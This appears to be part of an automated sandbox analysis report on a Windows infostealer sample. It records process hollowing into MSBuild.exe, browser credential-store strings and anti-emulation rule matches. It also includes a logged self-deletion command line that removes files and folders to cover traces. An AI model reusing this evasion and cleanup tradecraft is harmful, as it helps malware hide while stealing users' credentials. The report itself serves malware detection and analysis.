                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D075DD20_2_6D075DD2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D055DD00_2_6D055DD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D043C900_2_6D043C90
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D061CA00_2_6D061CA0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D07BFF10_2_6D07BFF1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D079FFC0_2_6D079FFC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D043E500_2_6D043E50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D055EB90_2_6D055EB9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D07B9640_2_6D07B964
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0558300_2_6D055830
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0558D50_2_6D0558D5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0558D70_2_6D0558D7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D079AAB0_2_6D079AAB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0434600_2_6D043460
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0550500_2_6D055050
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0432600_2_6D043260
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0552740_2_6D055274
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EBB8A80_2_02EBB8A8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB89580_2_02EB8958
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB10D00_2_02EB10D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB10900_2_02EB1090
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EB14F80_2_02EB14F8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_02EBF4980_2_02EBF498
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_054311E00_2_054311E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_05CC26F80_2_05CC26F8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_05CC0EB30_2_05CC0EB3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_05CC09300_2_05CC0930
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_05CC26F20_2_05CC26F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C07A1_2_0041C07A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041E1901_2_0041E190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BB291_2_0041BB29
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041CCA71_2_0041CCA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2ECD01_2_6CC2ECD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBCECC01_2_6CBCECC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC96C001_2_6CC96C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDAC601_2_6CBDAC60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAAC301_2_6CCAAC30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD4DB01_2_6CBD4DB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD5CDC01_2_6CD5CDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC66D901_2_6CC66D90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCFAD501_2_6CCFAD50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9ED701_2_6CC9ED70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD58D201_2_6CD58D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC70EC01_2_6CC70EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC56E901_2_6CC56E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDAEC01_2_6CBDAEC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6EE701_2_6CC6EE70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCB0E201_2_6CCB0E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDEFB01_2_6CBDEFB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAEFF01_2_6CCAEFF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD0FE01_2_6CBD0FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD18FB01_2_6CD18FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3EF401_2_6CC3EF40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD6F101_2_6CBD6F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC92F701_2_6CC92F70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD10F201_2_6CD10F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD68E01_2_6CCD68E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA48401_2_6CCA4840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC208201_2_6CC20820
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5A8201_2_6CC5A820
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCEC9E01_2_6CCEC9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC049F01_2_6CC049F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC609A01_2_6CC609A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A9A01_2_6CC8A9A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC909B01_2_6CC909B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC089601_2_6CC08960
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC269001_2_6CC26900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC4EA801_2_6CC4EA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC4CA701_2_6CC4CA70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC7EA001_2_6CC7EA00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC88A301_2_6CC88A30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD6BE01_2_6CCD6BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC70BA01_2_6CC70BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC164D01_2_6CC164D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6A4D01_2_6CC6A4D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCFA4801_2_6CCFA480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE84601_2_6CBE8460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC344201_2_6CC34420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5A4301_2_6CC5A430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC45B01_2_6CBC45B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9A5E01_2_6CC9A5E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC5E5F01_2_6CC5E5F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD185501_2_6CD18550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC285401_2_6CC28540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD45401_2_6CCD4540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC325601_2_6CC32560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC705701_2_6CC70570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2E6E01_2_6CC2E6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6E6E01_2_6CC6E6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF46D01_2_6CBF46D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2C6501_2_6CC2C650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFA7D01_2_6CBFA7D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC507001_2_6CC50700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE00B01_2_6CBE00B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC80901_2_6CBC8090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAC0B01_2_6CCAC0B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1E0701_2_6CC1E070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC9C0001_2_6CC9C000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC980101_2_6CC98010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBD01E01_2_6CBD01E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC381401_2_6CC38140
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D069B35 appears 141 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D06D520 appears 31 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: String function: 6D0690D8 appears 51 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CBF9B10 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD5DAE0 appears 46 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD5D930 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CBF3620 appears 51 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004024D7 appears 312 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004180A8 appears 104 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CD509D0 appears 196 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: invalid certificate
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005798000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624610288.0000000000A1E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameportableneweurope_hub8.exeP. vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePolly.dll, vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZipExtractor.dll: vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1768840583.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1763723745.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1768881282.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1762735635.000000000100B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenamePolly.dll, vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameZipExtractor.dll: vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeBinary or memory string: OriginalFilenameportableneweurope_hub8.exeP. vs SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, InflaterInputBuffer.csCryptographic APIs: 'TransformBlock'
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, DeflaterOutputStream.csCryptographic APIs: 'TransformBlock'
                    Source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.990d4c.3.raw.unpack, ZipAESTransform.csCryptographic APIs: 'TransformBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/32@1/2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,1_2_004106C4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.logJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6580
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: sqls[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: HDAAAA.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeReversingLabs: Detection: 34%
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeVirustotal: Detection: 38%
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
